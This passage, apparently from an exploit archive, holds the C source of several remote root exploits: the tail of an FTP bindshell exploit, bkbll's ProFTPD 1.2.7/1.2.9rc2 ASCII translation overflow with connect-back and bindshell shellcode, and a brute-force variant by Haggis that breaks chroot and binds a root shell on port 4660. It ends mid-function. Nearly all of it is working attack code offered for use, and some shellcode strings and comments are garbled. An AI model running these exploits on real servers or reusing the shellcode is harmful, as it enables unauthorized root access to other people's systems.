if (get_connect(FTP_PORT, argv[1]) ==-1)
{
perror(" Retrying! ");
loop-=0x1000;
sleep(2);
close(sock);
continue;
}
read_sock(temp);
send_sock (user);
read_sock(temp);
send_sock (evilbuff);
read_sock(temp);
close(sock);
sleep(3);// Let service respawn!
check_bindshell(BINDSHELL_PORT, argv[1]);
}}
printf("\n\nIf its still up... Go Again!\n\n");
exit(0);
}//End_Main
//Check For Bindshell 6969
int check_bindshell(int port, char *host)
{
fd_set rfds;
int sel=0, rd=0;
char *ptr = temp;
memset(temp, '\0', MAXSIZE);
if((sock=socket(AF_INET, SOCK_STREAM, 6))== -1)
{
perror("Socket Error.");
return -1;
}
if (get_connect(port, host) <0)
{
close (sock);
return -1;
}
else printf (" Yay~!\n\aWo0tWo0t! ... We got a shell on
%s!\n\n>", host);
// Start clean ..
fflush(stdin);
fflush(stdout);
fflush(stderr);
do {
FD_ZERO(&rfds);
FD_SET(0, &rfds);
FD_SET(sock, &rfds);
sel=select(sock+1, &rfds, NULL, NULL, NULL);
memset(temp, '\0', MAXSIZE);
if (sel) {
if(FD_ISSET(sock, &rfds)) {
rd=(read_sock(temp));
printf("%s", temp);
}
if(FD_ISSET(0, &rfds)) {
rd=(read(0, ptr, MAXSIZE-1));
send_sock(temp);
}
}
} while( sel && rd );
close(sock);
printf ("\nShell Aborted!\n");
exit(0);
}
//Do Socket Connect
int get_connect (int port, char *host)
{
struct sockaddr_in dest_addr;
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(port);
if (! inet_aton(host, &(dest_addr.sin_addr)))
return -1;
memset( &(dest_addr.sin_zero), '\0', 8);
if (connect (sock, (struct sockaddr *)&dest_addr, sizeof
(struct sockaddr)) == -1)
{
printf(" Fail!");
close(sock);
return -1;
}
else return 0;
}
//Send Data To Socket
int send_sock (char *buff)
{
int bytes = 0;
bytes = (send (sock, buff, strlen(buff), 0));
if (bytes == -1)
{
perror("Send Error.");
close(sock);
return -1;
}
else return bytes;
}
//Read Data From Socket
int read_sock (char *buff)
{
int bytes = 0;
bytes = (recv (sock, buff, MAXSIZE-1, 0));
if (bytes == -1)
{
perror ("Recv Error.");
close(sock);
return -1;
}
else return bytes;
}
//Usage Message
int usage (void)
{
printf ("\n\nUsage: %s [IP_ADDRESS] ", EXPLOIT);
printf ("\nExample: %s 10.0.0.1 \n\n", EXPLOIT);
exit (-1);
}
// [2003-09-11]
21 ProFTPD 1.2.9rc2 ASCII File Remote Root Exploit
/* proftpd 1.2.7/1.2.9rc2 remote root exploit by bkbll (bkbll#cnhonker.net, 2003/10/1)
* for FTP_ProFTPD_Translate_Overflow found by X-force
* happy birthday, China.
* this code is dirty, there are more beautiful exploits of proftpd for this vuln in the world.
* this code want to provied u a method, not finally exploit.
* using overflow _xlate_ascii_write function return address.
* because the overflow is before it connecting to our port,so I have no method for using current socket.
* and I have provied two method:bind port and connect back.
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define PORT 21
#define SIZE 1024
#define BIGSIZE 1024*42
#define OFFSET 39 //cbshellcode ip & port offset,0 is the first
#define OFF2 70 //bindshellcode port offset,0 is the first
#define VER "1.20"
char cbshellcode[]= //from www.netric.org,and modified some code by myself
"\x31\xc0\x31\xdb\x31\xc9\xb0\x17"
"\xcd\x80\x31\xc0\x51\xb1\x06\x51"
"\xb1\x01\x51\xb1\x02\x51\x89\xe1"
"\xb3\x01\xb0\x66\xcd\x80\x89\xc2"
"\x31\xc0\x31\xc9\x51\x51\x68\x41"
"\x42\x43\x44\x66\x68\xb0\xef\xb1"
"\x02\x66\x51\x90\x89\xe7\xb3\x10"
"\x53\x57\x52\x89\xe1\xb3\x03\xb0"
"\x66\xcd\x80\x31\xc9\x39\xc1\x74"
"\x06\x31\xc0\xb0\x01\xcd\x80\x31"
"\xc0\xb0\x3f\x89\xd3\xcd\x80\x31"
"\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd"
"\x80\x31\xc0\xb0\x3f\x89\xd3\xb1"
"\x02\xcd\x80\x31\xc9\x51\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69"
"\x89\xe3\x51\x68\x2d\x69\x69\x70"
"\x89\xe2\x51\x52\x53\x89\xe1\x31"
"\xd2\x31\xc0\xb0\x0b\xcd\x80\x31"
"\xc0\xb0\x01\xcd\x80";
char bindshellcode[]= //from www.netric.org,and modified some code by myself
"\x90\x90\x90\x31\xc0\x31\xdb\x31"
"\xc9\xb0\x17\xcd\x80\x31\xc0\xb0"
"\x02\xcd\x80\x39\xc3\x7c\x0c\x31"
"\xc0\xb0\x02\xcd\x80\x39\xc3\x7c"
"\x02\xeb\x06\x31\xc0\xb0\x01\xcd"
"\x80\x51\x31\xc0\x51\xb1\x01\x51"
"\xb1\x02\x51\x89\xe1\xb3\x01\xb0"
"\x66\xcd\x80\x89\xc1\x31\xc0\x31"
"\xdb\x50\x50\x50\x66\x68\xb0\xef"
"\xb3\x02\x66\x53\x89\xe2\xb3\x10"
"\x53\xb3\x02\x52\x51\x89\xca\x89"
"\xe1\xb0\x66\xcd\x80\x31\xdb\x39"
"\xc3\x74\x05\x31\xc0\x40\xcd\x80"
"\x31\xc0\x50\x52\x89\xe1\xb3\x04"
"\xb0\x66\xcd\x80\x89\xd7\x31\xc0"
"\x31\xdb\x31\xc9\xb3\x11\xb1\x01"
"\xb0\x30\xcd\x80\x31\xc0\x31\xdb"
"\x50\x50\x57\x89\xe1\xb3\x05\xb0"
"\x66\xcd\x80\x89\xc6\x31\xc0\x31"
"\xc9\x89\xf3\xb0\x3f\xcd\x80\x31"
"\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"
"\x41\xb0\x3f\xcd\x80\x31\xc9\x51"
"\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
"\x62\x69\x89\xe3\x51\x68\x2d\x69"
"\x69\x69\x89\xe2\x51\x52\x53\x89"
"\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
"\x80";
int sockfd,sockfd1,sockfd2;
int show=0;
int mustread=0;
int getshell=0;
int pt=6000;
unsigned int type=1;
char bindmethod=0;
char usrstr[]="USER";
char passtr[]="PASS";
char ascistr[]="TYPE A";
char pasvstr[]="PASV";
char portstr[]="PORT";
char storstr[]="STOR";
char retrstr[]="RETR";
char cmdbuf[SIZE];
char srvbuf[SIZE];
char *cbhost=NULL;
char *server=NULL;
struct
{
char *os;
unsigned int ret;
int backup; //using for next
} targets[] =
{
{ "rh8.0 ProFTPD 1.2.8 (stable) 1", 0xbffff25c,0},
{ "rh8.0 ProFTPD 1.2.8 (stable) 2", 0xbffff22c,0},
},v;
//main() {}
int sendbuf(int socket,char *buffer,int len);
int readbuf(char *s,int socket,char *buffer,int len);
int client_connect(int sockfd,char* server,int port);
void checkstatus(char *s);
void retrfile(char *s,int len,int port);
void storfile(char *s,int len,int port);
int dealpasv(char *s);
int setpasv();
void setport(char *l,int pt1);
void quit();
void storbuf(char *filename,char *buf,int size,int port);
void retrbuf(char *filename,char *buffer,int length,int port1);
void setascii();
void loginftp(char *user,char *pass);
void setfilename(char *s,int len);
int createbuffer(char *s,int len,int type,char *h);
int create_serv(int sfd,int port);
void modify(char *s,char *h,int port3);
void usage(char *s);
int execsh(int clifd);
int checklf(void *s,int len);
main(int argc,char **argv)
{
char buffer[BIGSIZE];
char cmdbuf[SIZE];
char srvbuf[SIZE];
char filename[30];
int j,a,b,port1;
int total;
char c;
char *user=NULL;
char *pass=NULL;
char *localip=NULL;
if(argc<2) usage(argv[0]);
while((c = getopt(argc, argv, "d:t:u:p:l:h:o:"))!= EOF)
{
switch (c)
{
case 'd':
server=optarg;
break;
case 't':
type = atoi(optarg);
if((type > sizeof(targets)/sizeof(v)) || (type < 1))
usage(argv[0]);
break;
case 'u':
user=optarg;
break;
case 'p':
pass=optarg;
break;
case 'l':
localip=optarg;
break;
case 'h':
cbhost=optarg;
break;
case 'o':
pt=atoi(optarg) & 0xffff;
break;
default:
usage(argv[0]);
return 1;
}
}
if(server==NULL || user==NULL || pass==NULL || localip==NULL)
usage(argv[0]);
printf("@---------------------------------------------------------@\n");
printf("# proftpd 1.2.7/1.2.9rc2 remote root exploit(01/10)-%s #\n",VER);
printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @\n");
printf("-----------------------------------------------------------\n");
printf("[+] Ret address:%p\n",targets[type-1].ret);
if(cbhost==NULL)
bindmethod=1;
else
{
if((int)inet_addr(cbhost)==-1)
{
printf("[-] Invalid connect back host/ip\n");
exit(0);
}
bindmethod=0;
}
port1=34568; //PORTÃüÃîµÄʱºòÔ Ú±¾µØ²úÉúµÄÃ� �»¸ö¶Ë¿Ú.
sockfd=sockfd1=sockfd2=0;
sockfd=socket(2,1,0);
if(client_connect(sockfd,server,PORT)<0) quit();
loginftp(user,pass);
//port1=setpasv(); //get the pasv port
setport(localip,port1);
setfilename(filename,30);
setascii();
total=createbuffer(buffer,BIGSIZE,type,cbhost);
//printf("[+] buffer data size:%d\n",total);
storbuf(filename,buffer,total,port1);
//stor over, then close and reconnect
close(sockfd);
close(sockfd1);
close(sockfd2);
sockfd=socket(2,1,0);
if(client_connect(sockfd,server,PORT)<0) quit(); //reconnect
loginftp(user,pass);
setascii();
setport(localip,port1); //get the pasv port,a new one
mustread=total;
retrbuf(filename,buffer,total,port1);
readbuf("The First time read",sockfd,srvbuf,SIZE);
port1++;
setport(localip,port1);
mustread=total;
getshell=1;
retrbuf(filename,buffer,total,port1);
quit();
}
void setfilename(char *s,int len)
{
int a;
memset(s,0,len);
a=getpid();
sprintf(s,"%d%d%d.txt",a,a,a);
}
void retrfile(char *s,int len,int port)
{
int i,pid;
char data1;
struct sockaddr_in client;
memset(&client,0,sizeof(client));
sockfd1=socket(2,1,0);
if(create_serv(sockfd1,port)<0) quit();
i=sizeof(client);
sockfd2=accept(sockfd1,(struct sockaddr *)&client,&i);
printf("[+] Accepted a client from %s\n",inet_ntoa(client.sin_addr));
memset(s,0,len);
if(getshell==1)
{
if(bindmethod==0)
{
printf("[+] Is it a shell on %s:%d?\n",cbhost,pt);
quit();
}
else
{
printf("[+] Waiting for a shell.....\n");
sockfd2=socket(AF_INET,SOCK_STREAM,0);
sleep(2);
client_connect(sockfd2,server,pt);
execsh(sockfd2);
quit();
}
}
readbuf(NULL,sockfd2,s,len);
close(sockfd2);
close(sockfd1);
}
void storfile(char *s,int len,int port)
{
int i;
struct sockaddr_in client;
memset(&client,0,sizeof(client));
sockfd1=socket(2,1,0);
if(create_serv(sockfd1,port)<0) quit();
//if(client_connect(sockfd1,HOST,port)<0) quit();
i=sizeof(client);
sockfd2=accept(sockfd1,(struct sockaddr *)&client,&i);
printf("[+] Accepted a client from %s\n",inet_ntoa(client.sin_addr));
sendbuf(sockfd2,s,len);
close(sockfd2);
close(sockfd1);
}
void setport(char *l,int pt1)
{
int a,i,b,c,j;
char buf[30];
memset(buf,0,30);
i=sprintf(buf,"%s",l);
for(a=0;a<i;a++)
if(buf[a]=='.') buf[a]=',';
memset(cmdbuf,0,SIZE);
b=(pt1 >> 8 ) & 0xff;
c=pt1 & 0xff;
j=sprintf(cmdbuf,"%s %s,%d,%d\r\n",portstr,buf,b,c);
printf("[+] %s",cmdbuf);
sendbuf(sockfd,cmdbuf,j);
readbuf(NULL,sockfd,srvbuf,SIZE);
checkstatus(srvbuf);
}
int dealpasv(char *s)
{
int a,b,c,d,e,f,g;
char *p1,*p2,*p3;
int i;
p1=(char *)malloc(100);
if(!s)
quit();
p2=strchr(s,'(');
//printf("p2:%s\n",p2);
p3=strchr(s,')');
//printf("p3:%s\n",p3);
p3++;
i=p3-p2;
memcpy(p1,p2,i);
p1[i]='\0';
//printf("p1:%s\n",p1);
sscanf(p1,"(%d,%d,%d,%d,%d,%d)",&a,&b,&c,&d,&e,&f);
//printf("a:%d,b:%d,c:%d,d:%d,e:%d,f:%d\n",a,b,c,d,e,f);
g=(e<<8) | f;
//printf("port:%d\n",g);
free(p1);
return g;
}
void quit()
{
if(sockfd>0)
close(sockfd);
if(sockfd1>0)
close(sockfd);
if(sockfd2>0)
close(sockfd);
exit(0);
}
int sendbuf(int socket,char *buffer,int len)
{
int j;
j=send(socket,buffer,len,0);
if(j==0)
{
printf("[-] server closed the socket\n");
quit();
}
if(j<0)
{
perror("[-] Send data error");
quit();
}
return j;
}
int readbuf(char *s,int socket,char *buffer,int len)
{
int a,b,i,j=0;
a=b=i=0;
memset(buffer,0,len);
if(s)
{
printf("[+] %s:",s);
fflush(stdout);
}
//j=lseek(socket,0,2);
//printf("j:%d\n",j);
if(mustread==0)
{
j=recv(socket,buffer,len-1,0);
if(j==0)
{
if(s)
printf("FAILED\n");
printf("[-] server closed the socket\n");
quit();
}
if(j<0)
{
if(s)
printf("FAILED\n");
perror("[-] read data error");
quit();
}
if(s)
printf("ok\n");
buffer[len-1]='\0';
if(show==1)
printf("<== %s",buffer);
}
else
{
//ÎÒÃDz»ÓùØÃÃ� ��·µ»ØһéʲÃÂ� �Êý¾Ã
b=mustread-i;
while(b>0)
{
a=b>(len-1)?(len-1):b;
i=recv(socket,buffer,a,0);
if(i==0)
{
if(s)
printf("FAILED\n");
printf("[-] server closed the socket\n");
quit();
}
if(i<0)
{
if(s)
printf("FAILED\n");
perror("[-] read data error");
quit();
}
if(s)
printf("ok\n");
b-=i;
j+=i;
}
//printf("j:%d,mustread:%d\n",j,mustread);
if(j!=mustread)
{
printf("read failed\n");
quit();
}
}
//show=0;
mustread=0;
return j;
}
int client_connect(int sockfd,char* server,int port)
{
struct sockaddr_in cliaddr;
struct hostent *host;
if((host=gethostbyname(server))==NULL)
{
printf("gethostbyname(%s) error\n",server);
return(-1);
}
bzero(&cliaddr,sizeof(struct sockaddr));
cliaddr.sin_family=AF_INET;
cliaddr.sin_port=htons(port);
cliaddr.sin_addr=*((struct in_addr *)host->h_addr);
printf("[+] Trying %s:%d....",server,port);
fflush(stdout);
if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))<0)
{
printf("error:%s\r\n",strerror(errno));
close(sockfd);
return(-1);
}
printf("ok\r\n");
return(0);
}
void checkstatus(char *s)
{
if(s==NULL)
quit();
if(isdigit(*s))
{
if(s[0]=='5')
{
printf("[-] Server told:%s\n",s);
quit();
}
else
return;
}
printf("[-] Server said:%s\n",s);
quit();
}
void loginftp(char *user,char *pass)
{
int j;
show=1;
readbuf("Get banner",sockfd,srvbuf,SIZE);
show=0;
memset(cmdbuf,0,SIZE);
//USER
j=sprintf(cmdbuf,"%s %s\r\n",usrstr,user);
sendbuf(sockfd,cmdbuf,j);
readbuf(NULL,sockfd,srvbuf,SIZE);
checkstatus(srvbuf);
//PASS
memset(cmdbuf,0,SIZE);
j=sprintf(cmdbuf,"%s %s\r\n",passtr,pass);
sendbuf(sockfd,cmdbuf,j);
readbuf(NULL,sockfd,srvbuf,SIZE);
checkstatus(srvbuf);
printf("[+] User %s logged in\n",user);
}
int setpasv()
{
int j,port1;
memset(cmdbuf,0,SIZE);
j=sprintf(cmdbuf,"%s\r\n",pasvstr);
sendbuf(sockfd,cmdbuf,j);
readbuf("Set PASV",sockfd,srvbuf,SIZE);
checkstatus(srvbuf);
port1=dealpasv(srvbuf); //get the pasv port
return port1;
}
void setascii()
{
int j;
memset(cmdbuf,0,SIZE);
j=sprintf(cmdbuf,"%s\r\n",ascistr);
sendbuf(sockfd,cmdbuf,j);
readbuf(NULL,sockfd,srvbuf,SIZE);
checkstatus(srvbuf);
}
void storbuf(char *filename,char *buf,int size,int port)
{
int j;
printf("[+] STOR file %s\n",filename);
memset(cmdbuf,0,SIZE);
j=sprintf(cmdbuf,"%s %s\r\n",storstr,filename);
sendbuf(sockfd,cmdbuf,j);
storfile(buf,size,port);
//check if the content is send overd
readbuf(NULL,sockfd,srvbuf,SIZE);
checkstatus(srvbuf);
}
void retrbuf(char *filename,char *buffer,int length,int port1)
{
int j;
printf("[+] RETR file %s\n",filename);
memset(cmdbuf,0,SIZE);
j=sprintf(cmdbuf,"%s %s\r\n",retrstr,filename);
sendbuf(sockfd,cmdbuf,j);
retrfile(buffer,length,port1);
readbuf(NULL,sockfd,srvbuf,SIZE);
checkstatus(srvbuf);
}
int createbuffer(char *s,int len,int type,char *h)
{
int i,a,total;
char buf[41];
unsigned int writeaddr=targets[type-1].ret;
writeaddr-=4;
if(checklf((void *)&writeaddr,4)<0)
{
printf("[-] Sorry, the ret addr %p=%p-4 have '\\n' char.\n",writeaddr,writeaddr+4);
quit();
}
a=i=0;
memset(s,0,len);
i+=3;
*(unsigned int *)(s+i)=writeaddr+7*4;
i+=4;
*(unsigned int *)(s+i)=writeaddr-0x600;
i+=4;
*(unsigned int *)(s+i)=writeaddr-0x400;
i+=4;
*(unsigned int *)(s+i)=writeaddr-0x200;
i+=4;
*(unsigned int *)(s+i)=writeaddr-0x300;
i+=4;
*(unsigned int *)(s+i)=0x0;
i+=4;
*(unsigned int *)(s+i)=0x90900eeb;
i+=4;
*(unsigned int *)(s+i)=0x0;
i+=4;
*(unsigned int *)(s+i)=0x0;
i+=4;
*(unsigned int *)(s+i)=0x0;
i+=4;
//connectback shellcode,modified ip & port
if(bindmethod==0)
{
modify(cbshellcode,h,pt);
memcpy(s+i,cbshellcode,strlen(cbshellcode));
i+=strlen(cbshellcode);
}
else
{
modify(bindshellcode,NULL,pt);
memcpy(s+i,bindshellcode,strlen(bindshellcode));
i+=strlen(bindshellcode);
}
memset(s+i,'Z',512-i);
memset(s+512,'\n',512);
total=1024;
memset(buf,0,41);
i=0;
memset(buf,'\n',20);
i+=20;
*(unsigned int *)(buf+i)=writeaddr;
i+=4;
*(unsigned int *)(buf+i)=writeaddr;
i+=4;
*(unsigned int *)(buf+i)=writeaddr+0x800; //here,the value must great than 0x600
i+=4;
*(unsigned int *)(buf+i)=writeaddr;
i+=4;
*(unsigned int *)(buf+i)=writeaddr;
//showmem(buf,40);
for(i=0;i<1024;i++)
{
a=(i*40)+1024;
memcpy(s+a,buf,40);
total+=40;
}
return total;
}
int create_serv(int sfd,int port)
{
struct sockaddr_in srvaddr;
int on=1;
bzero(&srvaddr,sizeof(struct sockaddr));
srvaddr.sin_port=htons(port);
srvaddr.sin_family=AF_INET;
srvaddr.sin_addr.s_addr=htonl(INADDR_ANY);
printf("[+] Listening on %d ....",port);
fflush(stdout);
setsockopt(sfd,SOL_SOCKET,SO_REUSEADDR,&on,sizeof(on)); //so I can rebind the port
if(bind(sfd,(struct sockaddr *)&srvaddr,sizeof(struct sockaddr))<0)
{
printf("FAILED\n");
perror("[-] Bind port error");
return(-1);
}
if(listen(sfd,5)<0)
{
printf("FAILED\n");
perror("[-] Listen error");
return(-1);
}
printf("ok\n");
return(0);
}
void modify(char *s,char *h,int port3)
{
int a,b,c,d;
if(h!=NULL)
{
sscanf(h,"%d.%d.%d.%d",&a,&b,&c,&d);
a&=0xff;
b&=0xff;
c&=0xff;
d&=0xff;
if((char)a=='\n' || (char)b=='\n' || (char)c=='\n' || (char)d=='\n')
{
printf("[-] Sorry, the connect back ip:%s have '\\n' char\n",h);
}
s[OFFSET] = a & 0xff;
s[OFFSET+1] = b & 0xff;
s[OFFSET+2] = c & 0xff;
s[OFFSET+3] = d & 0xff;
a=port3 >> 8 & 0xff;
b=port3 & 0xff;
if((char)a=='\n' || (char)b=='\n')
{
printf("[-] Sorry, the connect back port:%d have '\\n' char\n",port3);
quit();
}
s[OFFSET+6]=a;
s[OFFSET+7]=b;
}
else
{
a=port3 >> 8 & 0xff;
b=port3 & 0xff;
if((char)a=='\n' || (char)b=='\n')
{
printf("[-] Sorry, the bind port:%d have '\\n' char\n",port3);
quit();
}
s[OFF2]=a;
s[OFF2+1]=b;
}
}
void usage(char *s)
{
unsigned int a;
char *p;
int d=strlen(s)+1;
p=(char *)malloc(d);
memset(p,0x20,d-1);
p[d-1]=0;
printf("@---------------------------------------------------------@\n");
printf("# proftpd 1.2.7/1.2.9rc2 remote root exploit(01/10)-%s #\n",VER);
printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @\n");
printf("-----------------------------------------------------------\n");
printf("Usage:%s -d <host> -u <user> -p <pass> -t <type>\n",s);
printf(" %s -l <local ip> -h <cbip> -o <cbport>\n",p);
printf("Arguments:\n");
printf(" -d target host ip/name\n");
printf(" -u user name\n");
printf(" -p user paasword\n");
printf(" -l the ip of this machine u used\n");
printf(" -h connect back ip\n");
printf(" -o connect back port/bind port\n");
printf(" -t target type [default:%d]\n",type);
printf(" ------------------------------\n");
for(a = 0; a < sizeof(targets)/sizeof(v); a++)
printf(" %d [0x%.8x]: %s\n", a+1, targets[a].ret, targets[a].os);
printf("\n");
free(p);
exit(0);
}
int execsh(int clifd)
{
fd_set fds;
int count;
char buffer[SIZE];
memset(buffer,0,SIZE);
while(1)
{
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(clifd, &fds);
if (select(clifd+1, &fds, NULL, NULL, NULL) < 0)
{
if (errno == EINTR) continue;
break;
}
if (FD_ISSET(0, &fds))
{
count = read(0, buffer, SIZE);
if (count <= 0) break;
if (write(clifd, buffer, count) <= 0) break;
memset(buffer,0,SIZE);
}
if (FD_ISSET(clifd, &fds))
{
count = read(clifd, buffer, SIZE);
if (count <= 0) break;
if (write(1, buffer, count) <= 0) break;
memset(buffer,0,SIZE);
}
}
}
int checklf(void *sd,int len)
{
char *a;
int i=0;
a=(char *)sd;
for(i=0;i<len;i++)
if(*(a+i)=='\n') //found it
return -1;
return 0;
}
// [2003-10-04]
21 ProFTPD 1.2.7 - 1.2.9rc2 Remote Root & brute-force Exploit
/*
ProFTPd 1.2.7 - 1.2.9rc2 remote r00t exploit
--------------------------------------------
By Haggis
This exploit builds on the work of bkbll to
create a working, brute-force remote exploit
for the \n procesing bug in ProFTPd.
Tested on SuSE 8.0, 8.1 and RedHat 7.2/8.0
it works quite well... the RedHat boxes
worked on stack addresses in the 0xbffff2xx
region; the SuSE boxes were somewhat earlier
in the stack space - around 0xbfffe8xx.
This is the only public version you'll see
from Haggis@Doris - but it is very likely
that more powerful private versions will
be coded.
At present, this exploit breaks chroot (if
any) and spawns a shell bound to port 4660.
----------
This version is best run like so:
./proft_put_down -t hostname -l localIP -U incoming
where:
hostname = target box
localIP = your IP address
-U incoming specifies that the exploit will attempt
to create an 'incoming' directory on the remote ftp
server and work inside that. Without it, the shell-
code will probably not work properly. You have been
warned!
It is possible to use other credentials for logging
in to remote servers; anonymous is the default.
H.
*/
#include <stdio.h>
#include <ctype.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <stdarg.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/tcp.h>
#define STACK_START 0xbfffef04
#define STACK_END 0xbffff4f0
#define FTP_PORT 21
#define BINDSHELL_PORT 4660
#define SIZE 1024
#define EXPLOIT_BUF_SIZE 65535
#define DEFAULT_USER "anonymous"
#define DEFAULT_PASS "ftp@"
#define FAILURE -1
#define SUCCESS 0
#define NORMAL_DOWNLOAD 1
#define EXPLOIT_DOWNLOAD 2
#define DOWNLOAD 3
#define UPLOAD 4
#define ACCEPT_TIMEOUT 5
#define SLEEP_DELAY 19999999
/*
Leet 0-day HaggisCode (tm)
*/
char shellcode[] =
// setuid(0); setgid(0);
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80"
// fork() - parent terminates, killing proftpd and ending FTP
// session. This leaves the child process as a daemon...
"\x31\xc0\xb0\x02\xcd\x80\x89\xc3\x85\xdb\x74\x08\x 31"
"\xdb\x31\xc0\xb0\x01\xcd\x80"
// Finally, bind a shell to port 4660.
// This is a hacked version of the bindshell code by BigHawk.
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\x e1\x4b\xcd\x80"
"\x89\xc7\x52\x66\x68\x12\x34\x43\x66\x53\x89\xe1\x b0\x10\x50\x51"
"\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x 80\x50\x50\x57"
"\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x 3f\x49\xcd\x80"
"\x41\xe2\xf8\x51\x68\x2e\x2f\x61\x61\x89\xe3\x51\x 53\x89\xe1\xb0"
"\x0b\xcd\x80";
int controlSock, passiveSock;
int currentPassivePort=32769;
int currentServerPort=31337;
int exploitBufLen;
int attemptNumber=0;
int ftpPort=FTP_PORT;
unsigned int stackWriteAddr, retAddr;
char serverBuf[SIZE];
char exploitBuf[EXPLOIT_BUF_SIZE];
char uploadPath[SIZE]="";
char filename[SIZE*2];
char *server=NULL;
char *user=DEFAULT_USER;
char *pass=DEFAULT_PASS;
char *localIP=NULL;
char errorBuf[SIZE];
int connect_to_server(int port);
int login_to_server();
int set_passive_mode(int mode);
int set_ascii_mode();
int set_path_and_filename();
int check_for_linefeed();
int check_status();
int create_passive_server();
int create_exploit_buffer();
int upload_file();
int download_file(int mode);
void usage(char *s);
int do_remote_shell(int shellSock);
void status_bar(char *info);
int timeout_accept(int s, struct sockaddr *sa, int *f);
void my_send(int s, char *b, ...);
void my_recv(int s);
void my_sleep(int n);
void doris_chroot_breaker();
int main(int argc,char **argv)
{
int sleepMode=0;
char c;
unsigned int stackStartAddr=STACK_START;
if(argc<2) usage(argv[0]);
while((c = getopt(argc, argv, "t:u:p:l:U:sP:S:"))!= EOF) {
switch (c) {
case 't':
server=optarg;
break;
case 'u':
user=optarg;
break;
case 'p':
pass=optarg;
break;
case 'l':
localIP=optarg;
break;
case 's':
sleepMode=1;
break;
case 'U':
strncpy(uploadPath,optarg,SIZE);
break;
case 'P':
ftpPort=atoi(optarg);
break;
case 'S':
stackStartAddr=strtoul(optarg, NULL, 16);
break;
default:
usage(argv[0]);
return 1;
}
}
if(server==NULL || localIP==NULL)
usage(argv[0]);
printf("proftpd 1.2.7 - 1.2.9rc2 remote r00t exploit\n");
printf(" by Haggis ([email protected])\n");
doris_chroot_breaker();
for(stackWriteAddr=stackStartAddr; stackWriteAddr<STACK_END; stackWriteAddr+=4, attemptNumber++) {
if(check_for_linefeed()==FAILURE)
continue;
retAddr=stackWriteAddr+200; // good enough for show business
if((controlSock=connect_to_server(ftpPort))==FAILU RE) {
perror("\n\nFailing to connect to remote host\n");
exit(1);
}
if(login_to_server()==FAILURE) {
close(controlSock);
printf("\nERROR: Login failed.\n");
exit(1);
}
if(set_passive_mode(UPLOAD)==FAILURE)
goto err;
if(set_ascii_mode()==FAILURE)
goto err;
if(set_path_and_filename()==FAILURE)
goto err;
// create the buffer containing RET for this
// brute-force iteration
create_exploit_buffer();
if(upload_file()==FAILURE)
goto err;
close(controlSock);
// Connect again, then login, set ASCII mode and download the exploit file.
// This will trigger the overflow; as a result, we've
// corrupted the memory pool of this session and when we
// download the file again, the stack area will be overwritten
// and we control the saved EIP.
if((controlSock=connect_to_server(ftpPort))<0) {
perror("\nFailed to connect to remote host\n");
exit(1);
}
login_to_server(user,pass);
set_path_and_filename();
if(set_ascii_mode()==FAILURE)
goto err;
if(set_passive_mode(DOWNLOAD)==FAILURE)
goto err;
if(sleepMode)
sleep(10);
if(download_file(NORMAL_DOWNLOAD)==FAILURE)
goto err;
// Finally, read the file again. This will trigger the stack
// overwrite (NOT the overflow, that happened earlier). We could
// control EIP at this point and r00t may be only heartbeat away...
if(set_passive_mode(DOWNLOAD)==FAILURE)
goto err;
if(download_file(EXPLOIT_DOWNLOAD)==FAILURE)
goto err;
err:
close(controlSock);
}
// This is only reached if the bruteforce fails.
// delete the exploit files here
printf("\n\nNo r00t for you today I'm afraid.\n");
exit(1);
}
void status_bar(char *info) {
printf("[ %20s ]-[ Stack: 0x%08x ]-[ RET: 0x%08x ]\r",info, stackWriteAddr,retAddr);
fflush(stdout);
}
int set_path_and_filename()
{
status_bar("Setting filename");
if(strcmp(uploadPath,"")) {
my_send(controlSock, "CWD %s\r\n",uploadPath);
my_recv(controlSock);
}
snprintf(filename,SIZE,"proft_put_down-%d-%d.txt",getpid(),attemptNumber);
return SUCCESS;
}
int download_file(int mode)
{
int len, localServerSock, dataSock, bindShellSock;
struct sockaddr_in localServer;
status_bar("Downloading");
// Ask the victim server to send us the exploit file
my_send(controlSock, "RETR %s\r\n", filename);
// Create a listening server on our passive port to
// receive the data
memset(&localServer,0,sizeof(localServer));
localServerSock=create_passive_server();
len=sizeof(localServer);
// Wait for a few seconds for the victim server to contact us...
if((dataSock=timeout_accept(localServerSock,(struc t sockaddr *)&localServer,&len))<0) {
close(localServerSock);
return FAILURE;
}
// If the mode is EXPLOIT_DOWNLOAD, then this is the
// second attempt at downloading... that means we might
// have a shell waiting for us on the victim server, so
// we try to connect to it
if(mode==EXPLOIT_DOWNLOAD) {
if((bindShellSock=connect_to_server(BINDSHELL_PORT ))>=0) {
printf("\nConnected! You are r00t...\n");
do_remote_shell(bindShellSock);
printf("\nDid you have a nice time?\n");
exit(0);
}
close(dataSock);
close(localServerSock);
return SUCCESS;
}
// If the mode is NORMAL_DOWNLOAD, then just clean up the
// connection by receiving the file from the server; closing
// the data and local server sockets, then read the confirmation
// message from the control socket
my_recv(dataSock);
close(dataSock);
close(localServerSock);
my_recv(controlSock);
return check_status();
}
int timeout_accept(int s, struct sockaddr *sa, int *f)
{
fd_set fdset;
struct timeval timeout = { ACCEPT_TIMEOUT, 0 }; // seconds
int result;
if(s<=0)
